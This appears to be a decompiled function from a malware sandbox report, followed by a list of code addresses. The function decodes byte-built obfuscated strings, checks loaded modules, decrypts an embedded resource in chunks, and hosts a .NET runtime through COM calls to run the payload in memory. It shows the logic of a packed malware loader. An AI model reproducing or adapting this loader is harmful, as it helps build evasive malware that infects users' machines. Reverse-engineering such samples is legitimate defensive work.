				int _t440;
				int _t442;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				int _t469;
				int _t471;
				int _t482;
				signed int _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr _t493;
				void* _t494;
				struct HRSRC__* _t497;
				void* _t514;
				int _t519;
				intOrPtr* _t520;
				void* _t524;
				void* _t525;
				struct HINSTANCE__* _t526;
				intOrPtr _t527;
				void* _t531;
				void* _t535;
				struct HRSRC__* _t536;
				intOrPtr* _t537;
				intOrPtr* _t539;
				int _t542;
				int _t543;
				intOrPtr* _t547;
				intOrPtr* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				void* _t551;
				intOrPtr _t552;
				int _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t562;
				intOrPtr* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;

				_t567 = __eflags;
				_t494 = __edx;
				__imp__OleInitialize(0); // executed
				 *((char*)(_t556 + 0x18)) = 0xe0;
				 *((char*)(_t556 + 0x19)) = 0x3b;
				 *((char*)(_t556 + 0x1a)) = 0x8d;
				 *((char*)(_t556 + 0x1b)) = 0x2a;
				 *((char*)(_t556 + 0x1c)) = 0xa2;
				 *((char*)(_t556 + 0x1d)) = 0x2a;
				 *((char*)(_t556 + 0x1e)) = 0x2a;
				 *((char*)(_t556 + 0x1f)) = 0x41;
				 *((char*)(_t556 + 0x20)) = 0xd3;
				 *((char*)(_t556 + 0x21)) = 0x20;
				 *((char*)(_t556 + 0x22)) = 0x64;
				 *((char*)(_t556 + 0x23)) = 6;
				 *((char*)(_t556 + 0x24)) = 0x8a;
				 *((char*)(_t556 + 0x25)) = 0xf7;
				 *((char*)(_t556 + 0x26)) = 0x3d;
				 *((char*)(_t556 + 0x27)) = 0x9d;
				 *((char*)(_t556 + 0x28)) = 0xd9;
				 *((char*)(_t556 + 0x29)) = 0xee;
				 *((char*)(_t556 + 0x2a)) = 0x15;
				 *((char*)(_t556 + 0x2b)) = 0x68;
				 *((char*)(_t556 + 0x2c)) = 0xf4;
				 *((char*)(_t556 + 0x2d)) = 0x76;
				 *((char*)(_t556 + 0x2e)) = 0xb9;
				 *((char*)(_t556 + 0x2f)) = 0x34;
				 *((char*)(_t556 + 0x30)) = 0xbf;
				 *((char*)(_t556 + 0x31)) = 0x1e;
				 *((char*)(_t556 + 0x32)) = 0xe7;
				 *((char*)(_t556 + 0x33)) = 0x78;
				 *((char*)(_t556 + 0x34)) = 0x98;
				 *((char*)(_t556 + 0x35)) = 0xe9;
				 *((char*)(_t556 + 0x36)) = 0x6f;
				 *((char*)(_t556 + 0x37)) = 0xb4;
				 *((char*)(_t556 + 0x38)) = 0;
				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
				_t557 = _t556 + 0xc;
				if(_t337 == 0x41b2a0) {
					L80:
					__eflags = 0;
					return 0;
				} else {
					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t525 = _t340;
					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
					 *((char*)(_t557 + 0x64)) = 0xce;
					 *((char*)(_t557 + 0x65)) = 0x27;
					 *((char*)(_t557 + 0x66)) = 0x9c;
					 *((char*)(_t557 + 0x67)) = 0x1a;
					 *((char*)(_t557 + 0x68)) = 0x95;
					 *((char*)(_t557 + 0x69)) = 0x2e;
					 *((char*)(_t557 + 0x6a)) = 0x22;
					 *((char*)(_t557 + 0x6b)) = 0x57;
					 *((char*)(_t557 + 0x6c)) = 0x91;
					 *((char*)(_t557 + 0x6d)) = 0x21;
					 *((char*)(_t557 + 0x6e)) = 0x57;
					 *((char*)(_t557 + 0x6f)) = 0x3a;
					 *((char*)(_t557 + 0x70)) = 0xf8;
					 *((char*)(_t557 + 0x71)) = 0x98;
					 *((char*)(_t557 + 0x72)) = 0x5b;
					 *((char*)(_t557 + 0x73)) = 0xf4;
					 *((char*)(_t557 + 0x74)) = 0xb5;
					 *((char*)(_t557 + 0x75)) = 0x87;
					 *((char*)(_t557 + 0x76)) = 0x7b;
					 *((char*)(_t557 + 0x77)) = 0xf;
					 *((char*)(_t557 + 0x78)) = 0xf4;
					 *((char*)(_t557 + 0x79)) = 0x76;
					 *((char*)(_t557 + 0x7a)) = 0xb9;
					 *((char*)(_t557 + 0x7b)) = 0x34;
					 *((char*)(_t557 + 0x7c)) = 0xbf;
					 *((char*)(_t557 + 0x7d)) = 0x1e;
					 *((char*)(_t557 + 0x7e)) = 0xe7;
					 *((char*)(_t557 + 0x7f)) = 0x78;
					 *((char*)(_t557 + 0x80)) = 0x98;
					 *((char*)(_t557 + 0x81)) = 0xe9;
					 *((char*)(_t557 + 0x82)) = 0x6f;
					 *((char*)(_t557 + 0x83)) = 0xb4;
					 *((char*)(_t557 + 0x84)) = 0;
					 *((char*)(_t557 + 0x18)) = 0xc0;
					 *((char*)(_t557 + 0x19)) = 0x38;
					 *((char*)(_t557 + 0x1a)) = 0x8d;
					 *((char*)(_t557 + 0x1b)) = 0x1f;
					 *((char*)(_t557 + 0x1c)) = 0x8e;
					 *((char*)(_t557 + 0x1d)) = 0x30;
					 *((char*)(_t557 + 0x1e)) = 0x65;
					 *((char*)(_t557 + 0x1f)) = 0x47;
					 *((char*)(_t557 + 0x20)) = 0xd3;
					 *((char*)(_t557 + 0x21)) = 0x29;
					 *((char*)(_t557 + 0x22)) = 0x3b;
					 *((char*)(_t557 + 0x23)) = 0x56;
					 *((char*)(_t557 + 0x24)) = 0xf8;
					 *((char*)(_t557 + 0x25)) = 0x98;
					 *((char*)(_t557 + 0x26)) = 0x5b;
					 *((char*)(_t557 + 0x27)) = 0xf4;
					 *((char*)(_t557 + 0x28)) = 0xb5;
					 *((char*)(_t557 + 0x29)) = 0x87;
					 *((char*)(_t557 + 0x2a)) = 0x7b;
					 *((char*)(_t557 + 0x2b)) = 0xf;
					 *((char*)(_t557 + 0x2c)) = 0xf4;
					 *((char*)(_t557 + 0x2d)) = 0x76;
					 *((char*)(_t557 + 0x2e)) = 0xb9;
					 *((char*)(_t557 + 0x2f)) = 0x34;
					 *((char*)(_t557 + 0x30)) = 0xbf;
					 *((char*)(_t557 + 0x31)) = 0x1e;
					 *((char*)(_t557 + 0x32)) = 0xe7;
					 *((char*)(_t557 + 0x33)) = 0x78;
					 *((char*)(_t557 + 0x34)) = 0x98;
					 *((char*)(_t557 + 0x35)) = 0xe9;
					 *((char*)(_t557 + 0x36)) = 0x6f;
					 *((char*)(_t557 + 0x37)) = 0xb4;
					 *((char*)(_t557 + 0x38)) = 0;
					_t341 = Module32First(_t525, _t557 + 0x278); // executed
					if(_t341 == 0) {
						L38:
						FindCloseChangeNotification(_t525); // executed
						_t526 = GetModuleHandleA(0);
						 *((char*)(_t557 + 0x1c)) = 0xfc;
						 *((char*)(_t557 + 0x1d)) = 0xb;
						 *((char*)(_t557 + 0x1e)) = 0xff;
						 *((char*)(_t557 + 0x1f)) = 0x75;
						 *((char*)(_t557 + 0x20)) = 0xe7;
						 *((char*)(_t557 + 0x21)) = 0x44;
						 *((char*)(_t557 + 0x22)) = 0x4b;
						 *((char*)(_t557 + 0x23)) = 0x23;
						 *((char*)(_t557 + 0x24)) = 0xbf;
						 *((char*)(_t557 + 0x25)) = 0x45;
						 *((char*)(_t557 + 0x26)) = 0x3b;
						 *((char*)(_t557 + 0x27)) = 0x56;
						 *((char*)(_t557 + 0x28)) = 0xf8;
						 *((char*)(_t557 + 0x29)) = 0x98;
						 *((char*)(_t557 + 0x2a)) = 0x5b;
						 *((char*)(_t557 + 0x2b)) = 0xf4;
						 *((char*)(_t557 + 0x2c)) = 0xb5;
						 *((char*)(_t557 + 0x2d)) = 0x87;
						 *((char*)(_t557 + 0x2e)) = 0x7b;
						 *((char*)(_t557 + 0x2f)) = 0xf;
						 *((char*)(_t557 + 0x30)) = 0xf4;
						 *((char*)(_t557 + 0x31)) = 0x76;
						 *((char*)(_t557 + 0x32)) = 0xb9;
						 *((char*)(_t557 + 0x33)) = 0x34;
						 *((char*)(_t557 + 0x34)) = 0xbf;
						 *((char*)(_t557 + 0x35)) = 0x1e;
						 *((char*)(_t557 + 0x36)) = 0xe7;
						 *((char*)(_t557 + 0x37)) = 0x78;
						 *((char*)(_t557 + 0x38)) = 0x98;
						 *((char*)(_t557 + 0x39)) = 0xe9;
						 *((char*)(_t557 + 0x3a)) = 0x6f;
						 *((char*)(_t557 + 0x3b)) = 0xb4;
						 *((char*)(_t557 + 0x3c)) = 0;
						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
						_t558 = _t557 + 8;
						_t536 = FindResourceA(_t526, _t344, 0xa);
						 *(_t558 + 0x50) = _t536;
						_t551 = LoadResource(_t526, _t536);
						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
						_push(0x40022);
						_t537 = _t349; // executed
						_t350 = E0040AF66(0, _t526, __eflags); // executed
						_t559 = _t558 + 8;
						 *(_t559 + 0x34) = _t350;
						__eflags = _t350;
						if(_t350 == 0) {
							 *(_t559 + 0x50) = 0;
						} else {
							E0040BA30(_t526, _t350, 0, 0x40022);
							_t486 =  *(_t559 + 0x40);
							_t559 = _t559 + 0xc;
							 *(_t559 + 0x50) = _t486;
						}
						E00401300( *(_t559 + 0x50));
						_t497 =  *(_t559 + 0x48);
						_t352 = SizeofResource(_t526, _t497);
						 *(_t559 + 0x40) = _t352;
						asm("cdq");
						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
						__eflags = _t354;
						if(_t354 > 0) {
							_t519 =  *(_t559 + 0x3c);
							_t482 = _t537 - _t519;
							__eflags = _t482;
							 *(_t559 + 0x34) = _t519;
							 *(_t559 + 0x88) = _t482;
							 *(_t559 + 0x38) = _t354;
							do {
								_t424 =  *(_t559 + 0x34);
								_push( *(_t559 + 0x88) + _t424);
								_push(0x400);
								_push(_t424);
								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
								_t179 = _t559 + 0x38;
								 *_t179 =  *(_t559 + 0x38) - 1;
								__eflags =  *_t179;
							} while ( *_t179 != 0);
						}
						_t448 =  *(_t559 + 0x40) & 0x800003ff;
						__eflags = _t448;
						if(_t448 < 0) {
							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t448;
						}
						__eflags = _t448;
						if(_t448 > 0) {
							_t421 =  *(_t559 + 0x40) - _t448;
							_push(_t421 + _t537);
							_push(_t448);
							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
							__eflags = _t422;
							_push(_t422);
							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
						}
						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
						_t560 = _t559 + 0xc;
						FreeResource(_t551);
						_t552 =  *_t537;
						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
						_t561 = _t560 + 4;
						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
						_t527 =  *((intOrPtr*)(_t561 + 0x38));
						_t192 = _t537 + 4; // 0x4
						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
						_t528 = _t527 + 0xe;
						 *((char*)(_t561 + 0x34)) = 0xce;
						 *((char*)(_t561 + 0x35)) = 0x27;
						 *((char*)(_t561 + 0x36)) = 0x9c;
						 *((char*)(_t561 + 0x37)) = 0x1a;
						 *((char*)(_t561 + 0x38)) = 0x95;
						 *((char*)(_t561 + 0x39)) = 0x21;
						 *((char*)(_t561 + 0x3a)) = 0x2e;
						 *((char*)(_t561 + 0x3b)) = 0xd;
						 *((char*)(_t561 + 0x3c)) = 0xdb;
						 *((char*)(_t561 + 0x3d)) = 0x29;
						 *((char*)(_t561 + 0x3e)) = 0x57;
						 *((char*)(_t561 + 0x3f)) = 0x56;
						 *((char*)(_t561 + 0x40)) = 0xf8;
						 *((char*)(_t561 + 0x41)) = 0x98;
						 *((char*)(_t561 + 0x42)) = 0x5b;
						 *((char*)(_t561 + 0x43)) = 0xf4;
						 *((char*)(_t561 + 0x44)) = 0xb5;
						 *((char*)(_t561 + 0x45)) = 0x87;
						 *((char*)(_t561 + 0x46)) = 0x7b;
						 *((char*)(_t561 + 0x47)) = 0xf;
						 *((char*)(_t561 + 0x48)) = 0xf4;
						 *((char*)(_t561 + 0x49)) = 0x76;
						 *((char*)(_t561 + 0x4a)) = 0xb9;
						 *((char*)(_t561 + 0x4b)) = 0x34;
						 *((char*)(_t561 + 0x4c)) = 0xbf;
						 *((char*)(_t561 + 0x4d)) = 0x1e;
						 *((char*)(_t561 + 0x4e)) = 0xe7;
						 *((char*)(_t561 + 0x4f)) = 0x78;
						 *((char*)(_t561 + 0x50)) = 0x98;
						 *((char*)(_t561 + 0x51)) = 0xe9;
						 *((char*)(_t561 + 0x52)) = 0x6f;
						 *((char*)(_t561 + 0x53)) = 0xb4;
						 *((char*)(_t561 + 0x54)) = 0;
						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543); // executed
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x74f3cf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
													if(_t438 == 0) {
														L26:
														_t438 = 0;
													} else {
														_t438 =  *((intOrPtr*)(_t490 + 1));
														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
															break;
														} else {
															_t490 = _t490 + 2;
															_t549 = _t549 + 2;
															__eflags = _t438;
															if(_t438 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}

0x004019f0
0x004019f0
0x004019fd
0x00401a10
0x00401a15
0x00401a1a
0x00401a1f
0x00401a24
0x00401a29
0x00401a2e
0x00401a33
0x00401a38
0x00401a3d
0x00401a42
0x00401a47
0x00401a4c
0x00401a51
0x00401a56
0x00401a5b
0x00401a60
0x00401a65
0x00401a6a
0x00401a6f
0x00401a74
0x00401a79
0x00401a7e
0x00401a83
0x00401a88
0x00401a8d
0x00401a92
0x00401a97
0x00401a9c
0x00401aa1
0x00401aa6
0x00401aab
0x00401ab0
0x00401ab9
0x00401aba
0x00401abf
0x00401ac7
0x0040248d
0x0040248d
0x00402496
0x00401acd
0x00401ad6
0x00401ae2
0x00401ae6
0x00401af1
0x00401af6
0x00401afb
0x00401b00
0x00401b05
0x00401b0a
0x00401b0f
0x00401b14
0x00401b19
0x00401b1e
0x00401b23
0x00401b28
0x00401b2d
0x00401b32
0x00401b37
0x00401b3c
0x00401b41
0x00401b46
0x00401b4b
0x00401b50
0x00401b55
0x00401b5a
0x00401b5f
0x00401b64
0x00401b69
0x00401b6e
0x00401b73
0x00401b78
0x00401b7d
0x00401b85
0x00401b8d
0x00401b95
0x00401b9d
0x00401ba4
0x00401ba9
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbd
0x00401bc2
0x00401bc7
0x00401bcc
0x00401bd1
0x00401bd6
0x00401bdb
0x00401be0
0x00401be5
0x00401bea
0x00401bef
0x00401bf4
0x00401bf9
0x00401bfe
0x00401c03
0x00401c08
0x00401c0d
0x00401c12
0x00401c17
0x00401c1c
0x00401c21
0x00401c26
0x00401c2b
0x00401c30
0x00401c35
0x00401c3a
0x00401c3f
0x00401c44
0x00401c48
0x00401c4f
0x00401dc3
0x00401dc4
0x00401de0
0x00401de2
0x00401de7
0x00401dec
0x00401df1
0x00401df6
0x00401dfb
0x00401e00
0x00401e05
0x00401e0a
0x00401e0f
0x00401e14
0x00401e19
0x00401e1e
0x00401e23
0x00401e28
0x00401e2d
0x00401e32
0x00401e37
0x00401e3c
0x00401e41
0x00401e46
0x00401e4b
0x00401e50
0x00401e55
0x00401e5a
0x00401e5f
0x00401e64
0x00401e69
0x00401e6e
0x00401e73
0x00401e78
0x00401e7d
0x00401e82
0x00401e86
0x00401e8b
0x00401e96
0x00401e9a
0x00401ea4
0x00401eaf
0x00401eba
0x00401ebf
0x00401ec4
0x00401ec6
0x00401ecb
0x00401ece
0x00401ed2
0x00401ed4
0x00401eef
0x00401ed6
0x00401edd
0x00401ee2
0x00401ee6
0x00401ee9
0x00401ee9
0x00401ef7
0x00401efc
0x00401f02
0x00401f08
0x00401f0c
0x00401f15
0x00401f18
0x00401f1a
0x00401f1c
0x00401f22
0x00401f22
0x00401f24
0x00401f28
0x00401f2f
0x00401f33
0x00401f33
0x00401f40
0x00401f45
0x00401f4a
0x00401f4b
0x00401f50
0x00401f58
0x00401f58
0x00401f58
0x00401f58
0x00401f33
0x00401f63
0x00401f63
0x00401f69
0x00401f72
0x00401f72
0x00401f72
0x00401f73
0x00401f75
0x00401f7b
0x00401f80
0x00401f81
0x00401f86
0x00401f86
0x00401f8c
0x00401f8d
0x00401f8d
0x00401f9d
0x00401fa2
0x00401fa6
0x00401fac
0x00401faf
0x00401fb6
0x00401fbf
0x00401fc4
0x00401fc8
0x00401fce
0x00401fd3
0x00401fe0
0x00401fec
0x00401ffe
0x00402001
0x00402006
0x0040200b
0x00402010
0x00402015
0x0040201a
0x0040201f
0x00402024
0x00402029
0x0040202e
0x00402033
0x00402038
0x0040203d
0x00402042
0x00402047
0x0040204c
0x00402051
0x00402056
0x0040205b
0x00402060
0x00402065
0x0040206a
0x0040206f
0x00402074
0x00402079
0x0040207e
0x00402083
0x00402088
0x0040208d
0x00402092
0x00402097
0x0040209c
0x004020a1
0x004020a5
0x004020aa
0x004020ae
0x004020b4
0x004020b6
0x004020bb
0x004020c0
0x004020c5
0x004020ca
0x004020cf
0x004020d4
0x004020e1
0x004020e6
0x004020eb
0x004020f0
0x004020f5
0x004020fa
0x004020ff
0x00402104
0x00402109
0x0040210e
0x00402113
0x00402118
0x0040211d
0x00402122
0x00402127
0x0040212c
0x00402131
0x00402136
0x0040213b
0x00402140
0x00402145
0x0040214a
0x0040214f
0x00402154
0x00402159
0x0040215e
0x00402163
0x00402167
0x0040216c
0x00402171
0x00402177
0x00402179
0x0040217c
0x0040217e
0x00402183
0x00402188
0x0040218f
0x00402196
0x0040219a
0x0040219e
0x004021a2
0x004021a4
0x004021bc
0x004021be
0x004021c0
0x004021c6
0x004021ca
0x004021e5
0x004021ec
0x004021f1
0x00402213
0x00402215
0x00402217
0x0040221d
0x00402239
